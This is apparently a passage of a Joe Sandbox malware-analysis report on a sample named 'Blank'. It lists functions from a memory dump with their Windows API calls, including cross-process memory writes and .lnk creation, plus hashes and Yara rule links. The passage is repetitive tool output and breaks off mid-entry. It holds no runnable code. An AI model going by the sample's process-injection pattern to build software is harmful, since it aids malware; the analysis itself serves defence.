                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 44706859-0
                                                                                                                                    • Opcode ID: 2efc4f8017265c382d7c364fa1f66745629cde4eaab89b8402f5043c6e7b7049
                                                                                                                                    • Instruction ID: 5de6d35cbe94aba1ce8b70ef72d6785f32b23f2225db282668df2ea1135014d5
                                                                                                                                    • Opcode Fuzzy Hash: 2efc4f8017265c382d7c364fa1f66745629cde4eaab89b8402f5043c6e7b7049
                                                                                                                                    • Instruction Fuzzy Hash: 97F08130210206AFD7110FA4ECCCFB73B6CEF457A4F04012AF548C2190CA60AD10DB60
                                                                                                                                    Function 002BCD7C Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 002BCD90
                                                                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 002BCDA7
                                                                                                                                    • MessageBeep.USER32(00000000), ref: 002BCDBF
                                                                                                                                    • KillTimer.USER32(?,0000040A), ref: 002BCDDB
                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 002BCDF5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3741023627-0
                                                                                                                                    • Opcode ID: 49022e25f1635df3db41a0ebefcc2f69c0ab81fbbe0416fd351bb560597ce005
                                                                                                                                    • Instruction ID: 333c800e5a710d7d15137959202e0491597aef0edc45ad3c7ac29b180d1d2399
                                                                                                                                    • Opcode Fuzzy Hash: 49022e25f1635df3db41a0ebefcc2f69c0ab81fbbe0416fd351bb560597ce005
                                                                                                                                    • Instruction Fuzzy Hash: 72016274510705ABEB215F64ED8EFA67B7CFF00B55F100679A582A10E2DBF0A964CA80
                                                                                                                                    Function 0026178C Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2625713937-0
                                                                                                                                    • Opcode ID: c47e78de0f3335f75424392a4f8da013fb0355bec682f418844ca4ff0341ef4e
                                                                                                                                    • Instruction ID: fbc72cae85ecd33426b4cd2885a876d5b5173bad3786a2356d36a72625732c7b
                                                                                                                                    • Opcode Fuzzy Hash: c47e78de0f3335f75424392a4f8da013fb0355bec682f418844ca4ff0341ef4e
                                                                                                                                    • Instruction Fuzzy Hash: 09F0C930019209AFDB335F25ED4EB697BA8B701366F188228E429551F1CB3159A6DF10
                                                                                                                                    Function 002CC9DA Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 002CCA75
                                                                                                                                    • CoCreateInstance.OLE32(002F3D3C,00000000,00000001,002F3BAC,?), ref: 002CCA8D
                                                                                                                                      • Part of subcall function 00271A36: _memmove.LIBCMT ref: 00271A77
                                                                                                                                    • CoUninitialize.OLE32 ref: 002CCCFA
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                                    • String ID: .lnk
                                                                                                                                    • API String ID: 2683427295-24824748
                                                                                                                                    • Opcode ID: 5c42a5519bf63c1f4bff85f8a429f4803940d0a7a41b9b8bda90d438c979ddb1
                                                                                                                                    • Instruction ID: af720af65927a669a198a3a599ed7db52aeaf1373453c949cad7772d5f98c181
                                                                                                                                    • Opcode Fuzzy Hash: 5c42a5519bf63c1f4bff85f8a429f4803940d0a7a41b9b8bda90d438c979ddb1
                                                                                                                                    • Instruction Fuzzy Hash: 6FA15BB1114205AFD300EF64C881EABB7ECEF95754F00491DF19997292EB70EA69CF92
                                                                                                                                    Function 0026E3C6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00280FE6: std::exception::exception.LIBCMT ref: 0028101C
                                                                                                                                      • Part of subcall function 00280FE6: __CxxThrowException@8.LIBCMT ref: 00281031
                                                                                                                                      • Part of subcall function 00271A36: _memmove.LIBCMT ref: 00271A77
                                                                                                                                      • Part of subcall function 00271680: _memmove.LIBCMT ref: 002716DB
                                                                                                                                    • __swprintf.LIBCMT ref: 0026E598
                                                                                                                                    Strings
                                                                                                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0026E431
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                    • API String ID: 1943609520-557222456
                                                                                                                                    • Opcode ID: 1101850980fe6fb3a1bdc64cf659f770797928c81be7b9c2a09d8febcac862ea
                                                                                                                                    • Instruction ID: 5c722ec911318b8dfb5a0792e4536dceb9b14927041ec4d3ef1c03665cac4826
                                                                                                                                    • Opcode Fuzzy Hash: 1101850980fe6fb3a1bdc64cf659f770797928c81be7b9c2a09d8febcac862ea
                                                                                                                                    • Instruction Fuzzy Hash: C3918E751242119FCB14EF28C895C6FB7A8AF95704F41491DF8869B2A1EB30ED68CF52
                                                                                                                                    Function 002CBF7E Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00280284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00272A58,?,00008000), ref: 002802A4
                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 002CBFFE
                                                                                                                                    • CoCreateInstance.OLE32(002F3D3C,00000000,00000001,002F3BAC,?), ref: 002CC017
                                                                                                                                    • CoUninitialize.OLE32 ref: 002CC034
                                                                                                                                      • Part of subcall function 00264D37: __itow.LIBCMT ref: 00264D62
                                                                                                                                      • Part of subcall function 00264D37: __swprintf.LIBCMT ref: 00264DAC
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                                    • String ID: .lnk
                                                                                                                                    • API String ID: 2126378814-24824748
                                                                                                                                    • Opcode ID: c81f075dfdb03876a46f41e00348a49cdea75cc045f80891c6600e12ab73377f
                                                                                                                                    • Instruction ID: b34751e0bfe00c5f2917b93fd15b5059b44d6d34f290ea38450697c23b0d3287
                                                                                                                                    • Opcode Fuzzy Hash: c81f075dfdb03876a46f41e00348a49cdea75cc045f80891c6600e12ab73377f
                                                                                                                                    • Instruction Fuzzy Hash: 5FA13375614201AFC700EF54C884E6AB7E5BF89314F148A9CF8999B3A2CB31ED55CF91
                                                                                                                                    Function 0028523D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 002852CD
                                                                                                                                      • Part of subcall function 00290320: __87except.LIBCMT ref: 0029035B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorHandling__87except__start
                                                                                                                                    • String ID: pow
                                                                                                                                    • API String ID: 2905807303-2276729525
                                                                                                                                    • Opcode ID: c6f91763d390451d4f3d388ef660844bc771104f0545b0a503c2f5c1e87fbf25
                                                                                                                                    • Instruction ID: 1b52f9be177fb2c3aa2e18ebb8990b5289675eae18a5074531b67b5a182c1db1
                                                                                                                                    • Opcode Fuzzy Hash: c6f91763d390451d4f3d388ef660844bc771104f0545b0a503c2f5c1e87fbf25
                                                                                                                                    • Instruction Fuzzy Hash: A8517E29D3AA0BDBCF157F18D98137A67949B00750F2049A9E8C1852E9EF748CF4DB46
                                                                                                                                    Function 00280654 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: #$+
                                                                                                                                    • API String ID: 0-2552117581
                                                                                                                                    • Opcode ID: b8b2ab5561b8a514fffd68996b58823bee4b837a8d51a9ab9c9ac2626f389f55
                                                                                                                                    • Instruction ID: 8fe1a42345638134c8b5d3db0e46eecd9b363f4aa73075f54c55ad513c23505d
                                                                                                                                    • Opcode Fuzzy Hash: b8b2ab5561b8a514fffd68996b58823bee4b837a8d51a9ab9c9ac2626f389f55
                                                                                                                                    • Instruction Fuzzy Hash: C2513479521246CFDB15EF68C888AFABBA4EF55310F144055FC919B2D0D738ACBACB60
                                                                                                                                    Function 0026E7F7 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memmove$_free
                                                                                                                                    • String ID: #V'
                                                                                                                                    • API String ID: 2620147621-2359389714
                                                                                                                                    • Opcode ID: 75aca8245feef0a2f6e0d3c2f9e1f851b0ecca7613ec43c344c24e5edddefdae
                                                                                                                                    • Instruction ID: 064321b574ef91aa4f05a49b34ecf35049139733479cfc5203496fc4ec4a1660
                                                                                                                                    • Opcode Fuzzy Hash: 75aca8245feef0a2f6e0d3c2f9e1f851b0ecca7613ec43c344c24e5edddefdae
                                                                                                                                    • Instruction Fuzzy Hash: 17517C756243428FDB24DF28C481B2FB7E5BF85314F15492DE589872A0EB31EC61CB82
                                                                                                                                    Function 0027CF0C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memset$_memmove
                                                                                                                                    • String ID: ERCP
                                                                                                                                    • API String ID: 2532777613-1384759551
                                                                                                                                    • Opcode ID: 1003135ebc5ab3cbbfe98a8292e1438067e3c33fbae78bea7ca358ca4692aac0
                                                                                                                                    • Instruction ID: 76da52b796148effd949d860db29f6e3642ddadcc49d108db20f024ae2716a37
                                                                                                                                    • Opcode Fuzzy Hash: 1003135ebc5ab3cbbfe98a8292e1438067e3c33fbae78bea7ca358ca4692aac0
                                                                                                                                    • Instruction Fuzzy Hash: 2151D77192030A9FDB24CF64C8917EABBF8EF08310F24956EE44ADB241E770D5A5CB40
                                                                                                                                    Function 002BA3AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 002C1CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002B9E4E,?,?,00000034,00000800,?,00000034), ref: 002C1CE5
                                                                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 002BA3F7
                                                                                                                                      • Part of subcall function 002C1C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002B9E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 002C1CB0
                                                                                                                                      • Part of subcall function 002C1BDD: GetWindowThreadProcessId.USER32(?,?), ref: 002C1C08
                                                                                                                                      • Part of subcall function 002C1BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,002B9E12,00000034,?,?,00001004,00000000,00000000), ref: 002C1C18
                                                                                                                                      • Part of subcall function 002C1BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,002B9E12,00000034,?,?,00001004,00000000,00000000), ref: 002C1C2E
                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002BA464
                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002BA4B1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                    • String ID: @
                                                                                                                                    • API String ID: 4150878124-2766056989
                                                                                                                                    • Opcode ID: f1d8af498daa36f3f40ef0e3f493c86d6ca3d57494006e051d19d4f5c6e1f525
                                                                                                                                    • Instruction ID: 5fa9d00abf109868870254ed0f007657ef9bd5c33511db657783c455b4e502b7
                                                                                                                                    • Opcode Fuzzy Hash: f1d8af498daa36f3f40ef0e3f493c86d6ca3d57494006e051d19d4f5c6e1f525
                                                                                                                                    • Instruction Fuzzy Hash: 90412B72900218AEDB10DFA4CD86FEEB7B8AF45340F004199FA55A7181DA706E65CFA1
                                                                                                                                    Function 002E7F6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,002F0980,00000000,?,?,?,?), ref: 002E8004
                                                                                                                                    • GetWindowLongW.USER32 ref: 002E8021
                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 002E8031
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Long
                                                                                                                                    • String ID: SysTreeView32
                                                                                                                                    • API String ID: 847901565-1698111956
                                                                                                                                    • Opcode ID: 748bc43cf3e2c4229335fd78e4feb45aa5200ddd151bab425b03243b564d850a
                                                                                                                                    • Instruction ID: e6ba1591640a135ab45491c0c01056971a475f8f2920809f5af630a1282116b2
                                                                                                                                    • Opcode Fuzzy Hash: 748bc43cf3e2c4229335fd78e4feb45aa5200ddd151bab425b03243b564d850a
                                                                                                                                    • Instruction Fuzzy Hash: 2C31E331264646AFDB118E34CC45BEA77A9FB45334F204725F8B9932D1CB30E8A49B50
                                                                                                                                    Function 002E79FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 002E7A86
                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 002E7A9A
                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 002E7ABE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window
                                                                                                                                    • String ID: SysMonthCal32
                                                                                                                                    • API String ID: 2326795674-1439706946
                                                                                                                                    • Opcode ID: 65b8d0a4e3ee685d40e79ffb5e3223ae8b80170227bef7ba32a62ec2145d990d
                                                                                                                                    • Instruction ID: abd0e876a8050307525267df692c7ecc702306430bf816c0c68b8c162bc67eda
                                                                                                                                    • Opcode Fuzzy Hash: 65b8d0a4e3ee685d40e79ffb5e3223ae8b80170227bef7ba32a62ec2145d990d
                                                                                                                                    • Instruction Fuzzy Hash: 3521B132664259AFDF118F54CC86FEE3B69EF48724F110214FE156B290DAB1A860CB90
                                                                                                                                    Function 002E81B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 002E826F
                                                                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 002E827D
                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 002E8284
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
